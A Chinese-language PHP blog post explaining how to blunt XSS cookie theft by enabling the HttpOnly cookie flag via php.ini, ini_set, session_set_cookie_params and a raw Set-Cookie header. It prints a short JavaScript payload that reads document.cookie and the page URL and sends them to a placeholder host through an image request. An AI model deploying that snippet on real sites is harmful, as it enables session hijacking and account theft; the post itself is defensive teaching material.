xss防御之php利用httponly防xss攻击


Posted in PHP onMarch 21, 2014

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly

//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过:

header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是万能的!

PHP 相关文章推荐
桌面中心(三)修改数据库
Oct 09 PHP
提示Trying to clone an uncloneable object of class Imagic的解决
Oct 27 PHP
修改php.ini以达到屏蔽错误信息并记录日志
Jun 16 PHP
基于empty函数的判断详解
Jun 17 PHP
ThinkPHP自动转义存储富文本编辑器内容导致读取出错的解决方法
Aug 08 PHP
PHP使用feof()函数读文件的方法
Nov 07 PHP
浅析php创建者模式
Nov 25 PHP
使用Huagepage和PGO来提升PHP7的执行性能
Nov 30 PHP
PHP实现批量检测网站是否能够正常打开的方法
Aug 23 PHP
php实现水印文字和缩略图的方法示例
Dec 29 PHP
详解关于php的xdebug配置(编辑器vscode)
Jan 29 PHP
PHP实现PDO操作mysql存储过程示例
Feb 13 PHP
php5.3 goto函数介绍和示例
Mar 21 #PHP
php ctype函数中文翻译和示例
Mar 21 #PHP
php的declare控制符和ticks教程(附示例)
Mar 21 #PHP
php像数组一样存取和修改字符串字符
Mar 21 #PHP
easyui的tabs update正确用法分享
Mar 21 #PHP
php设置session值和cookies的学习示例
Mar 21 #PHP
一个显示效果非常不错的PHP错误、异常处理类
Mar 21 #PHP
You might like
让你的WINDOWS同时支持MYSQL4,MYSQL4.1,MYSQL5X
2006/12/06 PHP
检测png图片是否完整的php代码
2010/09/06 PHP
PHP新手入门学习方法
2011/05/08 PHP
如何在smarty中增加类似foreach的功能自动加载数据
2013/06/26 PHP
PHP中怎样保持SESSION不过期 原理及方案介绍
2013/08/08 PHP
PHP图像处理技术实例总结【绘图、水印、验证码、图像压缩】
2018/12/08 PHP
js返回上一页并刷新的多种实现方法
2014/02/26 Javascript
js中一维数组和二位数组中的几个问题示例说明
2014/07/17 Javascript
js实现带关闭按钮始终显示在网页最底部工具条的方法
2015/03/02 Javascript
JavaScript实现表格快速变色效果代码
2015/08/19 Javascript
JS+DIV+CSS实现的经典标签切换效果代码
2015/09/14 Javascript
通过Tabs方法基于easyUI+bootstrap制作工作站
2016/03/28 Javascript
全面理解JavaScript中的继承(必看)
2016/06/16 Javascript
JavaScript中的 attribute 和 jQuery中的 attr 方法浅析
2017/01/04 Javascript
详解JavaScript中return的用法
2017/05/08 Javascript
jQuery实现选中行变色效果(实例讲解)
2017/07/06 jQuery
实现图片首尾平滑轮播(JS原生方法—节流)
2017/10/17 Javascript
vue通过路由实现页面刷新的方法
2018/01/25 Javascript
vue主动刷新页面及列表数据删除后的刷新实例
2018/09/16 Javascript
详解webpack引入第三方库的方式以及注意事项
2019/01/15 Javascript
jquery实现二级导航下拉菜单效果实例
2019/05/14 jQuery
python导入csv文件出现SyntaxError问题分析
2017/12/15 Python
python实现简易通讯录修改版
2018/03/13 Python
在pandas中遍历DataFrame行的实现方法
2019/10/23 Python
Python脚本导出为exe程序的方法
2020/03/25 Python
Steve Madden官网:美国鞋类品牌
2017/01/29 全球购物
兰蔻美国官网:Lancome美国
2017/04/25 全球购物
GafasWorld哥伦比亚:网上购买眼镜
2017/11/28 全球购物
护理专业应届毕业生推荐信
2013/11/15 职场文书
毕业生就业推荐信范文
2013/12/01 职场文书
文秘专业个人求职信
2013/12/22 职场文书
音乐器材管理制度
2014/01/31 职场文书
另类冲刺标语
2014/06/24 职场文书
珍惜时间的诗歌赏析
2019/08/23 职场文书
mybatis源码解读之executor包语句处理功能
2022/02/15 Java/Android
Python通过loop.run_in_executor执行同步代码 同步变为异步
2022/04/11 Python